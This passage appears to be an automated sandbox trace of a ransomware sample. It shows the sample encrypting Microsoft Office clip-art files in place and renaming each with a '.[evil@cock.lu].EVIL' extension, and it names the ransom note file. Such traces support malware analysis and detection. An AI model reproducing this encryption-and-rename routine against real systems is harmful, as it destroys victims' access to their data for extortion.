_File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.586] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf.[evil@cock.lu].evil")) returned 1 [0152.587] ??_V@YAXPEAX@Z () returned 0x1 [0152.590] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF", dwFileAttributes=0x200) returned 0 [0152.590] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.590] wcsstr (_Str="J0237225.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.590] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF") returned 69 [0152.590] wcscmp (_String1="J0237225.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.590] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0237225.WMF") returned 0x0 [0152.590] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF") returned 0x45 [0152.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.593] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcba0, lpOverlapped=0x0) returned 1 [0152.600] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.600] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.600] _errno () returned 0x84b1160840 [0152.600] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.601] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xcbc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xcbc0, lpOverlapped=0x0) returned 1 [0152.601] CloseHandle (hObject=0x1a8) returned 1 [0152.601] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.601] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.601] __uncaught_exception () returned 0x84b1160800 [0152.601] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.601] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf.[evil@cock.lu].evil")) returned 1 [0152.602] ??_V@YAXPEAX@Z () returned 0x1 [0152.606] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF", dwFileAttributes=0x200) returned 0 [0152.606] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.606] wcsstr (_Str="J0237228.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.606] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF") returned 69 [0152.606] wcscmp (_String1="J0237228.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.606] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0237228.WMF") returned 0x0 [0152.606] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF") returned 0x45 [0152.606] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.608] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5700, lpOverlapped=0x0) returned 1 [0152.617] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.617] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.617] _errno () returned 0x84b1160840 [0152.618] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.618] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x5720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5720, lpOverlapped=0x0) returned 1 [0152.618] CloseHandle (hObject=0x1a8) returned 1 [0152.618] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.618] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.618] __uncaught_exception () returned 0x84b1160800 [0152.618] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.619] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf.[evil@cock.lu].evil")) returned 1 [0152.619] ??_V@YAXPEAX@Z () returned 0x1 [0152.623] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF", dwFileAttributes=0x200) returned 0 [0152.623] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.623] wcsstr (_Str="J0237336.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.623] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF") returned 69 [0152.623] wcscmp (_String1="J0237336.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.623] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0237336.WMF") returned 0x0 [0152.623] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF") returned 0x45 [0152.623] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.625] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x60c2, lpOverlapped=0x0) returned 1 [0152.635] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.635] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.635] _errno () returned 0x84b1160840 [0152.635] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.635] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x60e0, lpOverlapped=0x0) returned 1 [0152.635] CloseHandle (hObject=0x1a8) returned 1 [0152.635] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.636] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.636] __uncaught_exception () returned 0x84b1160800 [0152.636] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.636] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf.[evil@cock.lu].evil")) returned 1 [0152.637] ??_V@YAXPEAX@Z () returned 0x1 [0152.640] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF", dwFileAttributes=0x200) returned 0 [0152.640] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.640] wcsstr (_Str="J0237759.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.640] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF") returned 69 [0152.640] wcscmp (_String1="J0237759.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.640] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0237759.WMF") returned 0x0 [0152.640] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF") returned 0x45 [0152.640] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.643] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x51be, lpOverlapped=0x0) returned 1 [0152.665] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.665] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.665] _errno () returned 0x84b1160840 [0152.665] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.665] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x51c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x51c0, lpOverlapped=0x0) returned 1 [0152.665] CloseHandle (hObject=0x1a8) returned 1 [0152.665] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.666] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.666] __uncaught_exception () returned 0x84b1160800 [0152.666] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.666] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf.[evil@cock.lu].evil")) returned 1 [0152.667] ??_V@YAXPEAX@Z () returned 0x1 [0152.670] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF", dwFileAttributes=0x200) returned 0 [0152.671] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.671] wcsstr (_Str="J0238333.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.671] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF") returned 69 [0152.671] wcscmp (_String1="J0238333.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.671] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0238333.WMF") returned 0x0 [0152.671] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF") returned 0x45 [0152.671] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.673] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x59a0, lpOverlapped=0x0) returned 1 [0152.682] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.682] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.682] _errno () returned 0x84b1160840 [0152.683] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.683] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x59c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x59c0, lpOverlapped=0x0) returned 1 [0152.683] CloseHandle (hObject=0x1a8) returned 1 [0152.683] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.683] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.683] __uncaught_exception () returned 0x84b1160800 [0152.683] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.684] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf.[evil@cock.lu].evil")) returned 1 [0152.685] ??_V@YAXPEAX@Z () returned 0x1 [0152.688] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF", dwFileAttributes=0x200) returned 0 [0152.688] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.688] wcsstr (_Str="J0238927.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.688] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF") returned 69 [0152.688] wcscmp (_String1="J0238927.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.688] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0238927.WMF") returned 0x0 [0152.688] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF") returned 0x45 [0152.688] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.690] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1334, lpOverlapped=0x0) returned 1 [0152.697] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.697] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.697] _errno () returned 0x84b1160840 [0152.697] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.697] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1340, lpOverlapped=0x0) returned 1 [0152.697] CloseHandle (hObject=0x1a8) returned 1 [0152.697] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.697] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.697] __uncaught_exception () returned 0x84b1160800 [0152.697] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.698] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf.[evil@cock.lu].evil")) returned 1 [0152.698] ??_V@YAXPEAX@Z () returned 0x1 [0152.701] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF", dwFileAttributes=0x200) returned 0 [0152.701] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.701] wcsstr (_Str="J0238959.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.701] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF") returned 69 [0152.701] wcscmp (_String1="J0238959.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.701] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0238959.WMF") returned 0x0 [0152.701] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF") returned 0x45 [0152.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.703] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d3c, lpOverlapped=0x0) returned 1 [0152.710] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.710] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.710] _errno () returned 0x84b1160840 [0152.710] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.710] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d40, lpOverlapped=0x0) returned 1 [0152.711] CloseHandle (hObject=0x1a8) returned 1 [0152.711] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.711] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.711] __uncaught_exception () returned 0x84b1160800 [0152.711] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.711] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf.[evil@cock.lu].evil")) returned 1 [0152.712] ??_V@YAXPEAX@Z () returned 0x1 [0152.715] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF", dwFileAttributes=0x200) returned 0 [0152.715] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0152.715] wcsstr (_Str="J0238983.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0152.715] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF") returned 69 [0152.715] wcscmp (_String1="J0238983.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0152.715] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0238983.WMF") returned 0x0 [0152.715] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF") returned 0x45 [0152.715] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0152.717] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13b8, lpOverlapped=0x0) returned 1 [0152.724] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.724] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0152.724] _errno () returned 0x84b1160840 [0152.724] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.724] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13c0, lpOverlapped=0x0) returned 1 [0152.724] CloseHandle (hObject=0x1a8) returned 1 [0152.724] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0152.724] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0152.724] __uncaught_exception () returned 0x84b1160800 [0152.724] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0152.725] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238983.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238983.wmf.[evil@cock.lu].evil")) returned 1 [0152.725] ??_V@YAXPEAX@Z () returned 0x1 [0152.728] SetFileAttributesW 